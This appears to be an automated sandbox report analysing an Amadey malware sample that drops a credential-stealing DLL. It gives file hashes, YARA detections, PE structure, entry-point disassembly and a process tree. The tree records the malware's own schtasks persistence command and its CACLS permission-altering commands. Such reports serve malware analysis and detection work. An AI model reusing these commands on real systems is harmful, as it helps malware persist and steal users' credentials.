MD5:	C0FD0167E213B6148333351BD16ED1FB
SHA1:	1CFB2B42686557656DEAD53E02D1DB3F2A848026
SHA-256:	C7D804E8FB096769B0E199102BDF8EFA97DFAE1A9B57A479819971146877368B
SHA-512:	D514F35E62A5380B4AD96A3E0CDDF82B53B1CF273E5AC542F040F30A75EFD3C246FA2194E4BB273572CD2436A435A608E2B919F6DF9FA4EBBF452B0D297B0CF9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll, Author: Joe Security Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 76%, Browse
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......\|.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\853321935212

Download File

Process:	C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	106998
Entropy (8bit):	7.931081347539571
Encrypted:	false
SSDEEP:	3072:AaS3c0TNQHdOKX1TNrpF4RNpMwAwip0R+x0jZo88oH:FS3T+IKX1TFeNpMwAppu+x0jSIH
MD5:	AA417810BB1B315B4C98F34E9C818EBF
SHA1:	8C2E51236436389FEE349609CD927FFFE3EBE33E
SHA-256:	A3D34F284B9BE068B15587E25ADDBC6FAFCF19830F63FBACC664D9C4227471C5
SHA-512:	0FBC38A22C0EEB72BD550DFC5DB37C048C582D39B186371A5A25F4B101B5B358857E41EA84DADF1DBEF0DD6EF365472ADFFD5E22AC0C2A12635FC72B00B9313C
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............\|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	431104
Entropy (8bit):	6.164008559136768
Encrypted:	false
SSDEEP:	6144:a9pGLNufx0o4GxBVragEIMG4rBBjG76EJXvHXhh6K9W9YGhFded89kTt:aWJufiJGxRlMG56KJIK9W9Vhmac
MD5:	2365CD5930C2845769177B920D4B8AD6
SHA1:	1246C7F15B215BF1ECC70294434CCD19A1778DAF
SHA-256:	77BFC0F4BF45082FC3C52C3C10D4394D925C116FDA4B3EDA7F09151A57AD4010
SHA-512:	D0CE6DB1B428862BDAD3BE0C7CAFC0987A0B39E7A62FFA14222BA635ECB1C3830D53E6413615637A640599FE5A453898A1B42EDC872D06F49184B0A6F3265669
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.m....C...C...C...C(..C...C...C...C...C$%xC...C...C}..C...C...C...C...C...C...CRich...C........PE..L...\q.b.................n...R.......p............@.................................l........................................s..<.... ..............................................................0I..@............................................text...Vm.......n.................. ..`.data...D\|.......N...r..............@....sapara.............................@..@.dinol..p...........................@..@.rsrc........ ......................@..@.reloc..l............v..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	129024
Entropy (8bit):	6.511981065302762
Encrypted:	false
SSDEEP:	3072:Yx7pOYzBek53tiINwyP7XSSJds3zhrjPcnqULv4i9:Yx7ZNh53vwyOztPc3L
MD5:	C0FD0167E213B6148333351BD16ED1FB
SHA1:	1CFB2B42686557656DEAD53E02D1DB3F2A848026
SHA-256:	C7D804E8FB096769B0E199102BDF8EFA97DFAE1A9B57A479819971146877368B
SHA-512:	D514F35E62A5380B4AD96A3E0CDDF82B53B1CF273E5AC542F040F30A75EFD3C246FA2194E4BB273572CD2436A435A608E2B919F6DF9FA4EBBF452B0D297B0CF9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, Author: Joe Security Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......\|.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\cacls.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	15
Entropy (8bit):	3.240223928941852
Encrypted:	false
SSDEEP:	3:o3F:o1
MD5:	509B054634B6DE74F111C3E646BC80FD
SHA1:	99B4C0F39144A92FE42E22473A2A2552FB16BD13
SHA-256:	07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
SHA-512:	A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
Malicious:	false
Preview:	processed dir:

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.164008559136768
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	431104
MD5:	2365cd5930c2845769177b920d4b8ad6
SHA1:	1246c7f15b215bf1ecc70294434ccd19a1778daf
SHA256:	77bfc0f4bf45082fc3c52c3c10d4394d925c116fda4b3eda7f09151a57ad4010
SHA512:	d0ce6db1b428862bdad3be0c7cafc0987a0b39e7a62ffa14222ba635ecb1c3830d53e6413615637a640599fe5a453898a1b42edc872d06f49184b0a6f3265669
SSDEEP:	6144:a9pGLNufx0o4GxBVragEIMG4rBBjG76EJXvHXhh6K9W9YGhFded89kTt:aWJufiJGxRlMG56KJIK9W9Vhmac
TLSH:	8C94DF113284C8F2C7620E335816CBE5EA7FB46AFB286527F358775F6EB02E15962305
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.m....C...C...C...C(..C...C...C...C...C$%xC...C...C}..C...C...C...C...C...C...CRich...C........PE..L...\q.b.................n.

File Icon


Icon Hash:	8286dccea68c9c84

Static PE Info

General

Entrypoint:	0x407096
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6207715C [Sat Feb 12 08:35:40 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	eeffe9860bc9c6507e24465b9b5239be

Entrypoint Preview

Instruction
call 00007F756CE8EA8Ch
jmp 00007F756CE88DEEh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 28h
xor eax, eax
push ebx
mov ebx, dword ptr [ebp+0Ch]
push esi
mov esi, dword ptr [ebp+10h]
push edi
mov edi, dword ptr [ebp+08h]
mov byte ptr [ebp-08h], al
mov byte ptr [ebp-07h], al
mov byte ptr [ebp-06h], al
mov byte ptr [ebp-05h], al
mov byte ptr [ebp-04h], al
mov byte ptr [ebp-03h], al
mov byte ptr [ebp-02h], al
mov byte ptr [ebp-01h], al
cmp dword ptr [0044CC84h], eax
je 00007F756CE88F80h
push dword ptr [0044FC28h]
call 00007F756CE8D9B8h
pop ecx
jmp 00007F756CE88F77h
mov eax, 0040CC48h
mov ecx, dword ptr [ebp+14h]
mov edx, 000000A6h
cmp ecx, edx
jg 00007F756CE890EAh
je 00007F756CE890D1h
cmp ecx, 19h
jg 00007F756CE8906Eh
je 00007F756CE8905Fh
mov edx, ecx
push 00000002h
pop ecx
sub edx, ecx
je 00007F756CE89043h
dec edx
je 00007F756CE89033h
sub edx, 05h
je 00007F756CE8901Bh
dec edx
je 00007F756CE88FFCh
sub edx, 05h
je 00007F756CE88FE3h
dec edx
je 00007F756CE88FB7h
sub edx, 09h
jne 00007F756CE8914Ah
mov dword ptr [ebp-28h], 00000003h
mov dword ptr [ebp-24h], 00401348h
fld qword ptr [edi]
lea ecx, dword ptr [ebp-28h]
fstp qword ptr [ebp-20h]
push ecx
fld qword ptr [ebx]
fstp qword ptr [ebp+00h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x173c4	0x3c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52000	0x1a510	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6d000	0xda4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x11f0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4930	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x19c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x16d56	0x16e00	False	0.5951908299180327	data	6.699967099151553	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x18000	0x37c44	0x34e00	False	0.5780372709810875	data	5.570784865279521	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.sapara	0x50000	0xbb8	0xc00	False	0.008138020833333334	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.dinol	0x51000	0x270	0x400	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x52000	0x1a510	0x1a600	False	0.6376073755924171	data	6.24716016689426	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6d000	0x1c6c	0x1e00	False	0.38958333333333334	data	3.882369381588875	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AFX_DIALOG_LAYOUT	0x6a450	0x2	data	Slovak	Slovakia
AFX_DIALOG_LAYOUT	0x6a438	0x2	data	Slovak	Slovakia
AFX_DIALOG_LAYOUT	0x6a440	0xc	data	Slovak	Slovakia
SUXUMOWUDAKOLA	0x682d0	0x2107	ASCII text, with very long lines (8455), with no line terminators	Slovak	Slovakia
RT_CURSOR	0x6a458	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Slovak	Slovakia
RT_CURSOR	0x6b300	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Slovak	Slovakia
RT_CURSOR	0x6bbd0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0	Slovak	Slovakia
RT_CURSOR	0x6bd00	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0	Slovak	Slovakia
RT_ICON	0x52990	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x53058	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x55600	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x55a98	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x56940	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x571e8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x57750	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x59cf8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x5ada0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x5b728	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x5bbf8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x5caa0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x5d348	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x5da10	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x5df78	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x60520	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x615c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x61a98	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Slovak	Slovakia
RT_ICON	0x62940	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Slovak	Slovakia
RT_ICON	0x631e8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Slovak	Slovakia
RT_ICON	0x638b0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Slovak	Slovakia
RT_ICON	0x63e18	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Slovak	Slovakia
RT_ICON	0x663c0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Slovak	Slovakia
RT_ICON	0x67468	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Slovak	Slovakia
RT_ICON	0x67df0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Slovak	Slovakia
RT_STRING	0x6bfc8	0x546	data	Slovak	Slovakia
RT_ACCELERATOR	0x6a3d8	0x40	data	Slovak	Slovakia
RT_GROUP_CURSOR	0x6bba8	0x22	data	Slovak	Slovakia
RT_GROUP_CURSOR	0x6bdb0	0x22	data	Slovak	Slovakia
RT_GROUP_ICON	0x61a30	0x68	data	Slovak	Slovakia
RT_GROUP_ICON	0x55a68	0x30	data	Slovak	Slovakia
RT_GROUP_ICON	0x5bb90	0x68	data	Slovak	Slovakia
RT_GROUP_ICON	0x68258	0x76	data	Slovak	Slovakia
RT_VERSION	0x6bdd8	0x1f0	MS Windows COFF PowerPC object file	Slovak	Slovakia
None	0x6a418	0xa	data	Slovak	Slovakia
None	0x6a428	0xa	data	Slovak	Slovakia

Imports

DLL

Import

KERNEL32.dll

FillConsoleOutputCharacterA, GetCPInfo, GetProfileIntW, GetSystemDefaultLCID, GetModuleHandleW, WaitNamedPipeW, TlsSetValue, GetPriorityClass, GetVolumeInformationA, LoadLibraryW, IsProcessInJob, AssignProcessToJobObject, GetCalendarInfoW, GetFileAttributesA, TransactNamedPipe, WriteConsoleW, GetVolumePathNameA, CreateJobObjectA, GetVolumeNameForVolumeMountPointA, FillConsoleOutputCharacterW, GetLastError, GetProcAddress, VirtualAlloc, EnumSystemCodePagesW, SetFileAttributesA, LoadLibraryA, WriteConsoleA, GetProcessWorkingSetSize, LocalAlloc, OpenJobObjectW, FoldStringW, FoldStringA, FindFirstChangeNotificationA, GetFileInformationByHandle, FindActCtxSectionStringW, LCMapStringW, GetConsoleAliasesW, GetFullPathNameW, HeapFree, HeapAlloc, Sleep, ExitProcess, GetStartupInfoW, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapReAlloc, WriteFile, GetStdHandle, GetModuleFileNameA, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlUnwind, SetHandleCount, GetFileType, GetStartupInfoA, SetFilePointer, TlsGetValue, TlsAlloc, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RaiseException, GetConsoleOutputCP, MultiByteToWideChar, SetStdHandle, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, CreateFileA, GetModuleHandleA, HeapSize, GetLocaleInfoA, LCMapStringA, GetStringTypeA, GetStringTypeW, SetEndOfFile, GetProcessHeap, ReadFile

ADVAPI32.dll

BackupEventLogW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Slovak	Slovakia

Network Behavior

⊘No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 204, Parent PID: 3528

General

Target ID:	0
Start time:	10:32:01
Start date:	09/12/2022
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	431104 bytes
MD5 hash:	2365CD5930C2845769177B920D4B8AD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.314298922.00000000006E3000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.311169503.0000000000650000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.314200617.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.314200617.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: gntuud.exePID: 3332, Parent PID: 204

General

Target ID:	1
Start time:	10:32:08
Start date:	09/12/2022
Path:	C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe"
Imagebase:	0x400000
File size:	431104 bytes
MD5 hash:	2365CD5930C2845769177B920D4B8AD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.326614950.0000000002120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 1496, Parent PID: 3332

General

Target ID:	2
Start time:	10:32:14
Start date:	09/12/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
Imagebase:	0x11d0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1680, Parent PID: 1496

General

Target ID:	3
Start time:	10:32:15
Start date:	09/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5268, Parent PID: 3332

General

Target ID:	4
Start time:	10:32:15
Start date:	09/12/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y\|CACLS "..\9c69749b54" /P "user:N"&&CACLS "..\9c69749b54" /P "user:R" /E&&Exit
Imagebase:	0xd90000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6084, Parent PID: 5268

General

Target ID:	5
Start time:	10:32:16
Start date:	09/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1372, Parent PID: 5268

General

Target ID:	6
Start time:	10:32:17
Start date:	09/12/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0xd90000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 6060, Parent PID: 5268

General

Target ID:	7
Start time:	10:32:18
Start date:	09/12/2022
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "gntuud.exe" /P "user:N"
Imagebase:	0xb50000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: gntuud.exePID: 6036, Parent PID: 1088

General

Target ID:	8
Start time:	10:32:18
Start date:	09/12/2022
Path:	C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
Imagebase:	0x7ff7c72c0000
File size:	431104 bytes
MD5 hash:	2365CD5930C2845769177B920D4B8AD6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.385361747.000000000061B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000003.383588182.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 4692, Parent PID: 5268

General

Target ID:	9
Start time:	10:32:19
Start date:	09/12/2022
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "gntuud.exe" /P "user:R" /E
Imagebase:	0xb50000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5256, Parent PID: 5268

General

Target ID:	10
Start time:	10:32:19
Start date:	09/12/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0xd90000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 5024, Parent PID: 5268

General

Target ID:	11
Start time:	10:32:19
Start date:	09/12/2022
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\9c69749b54" /P "user:N"
Imagebase:	0xb50000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
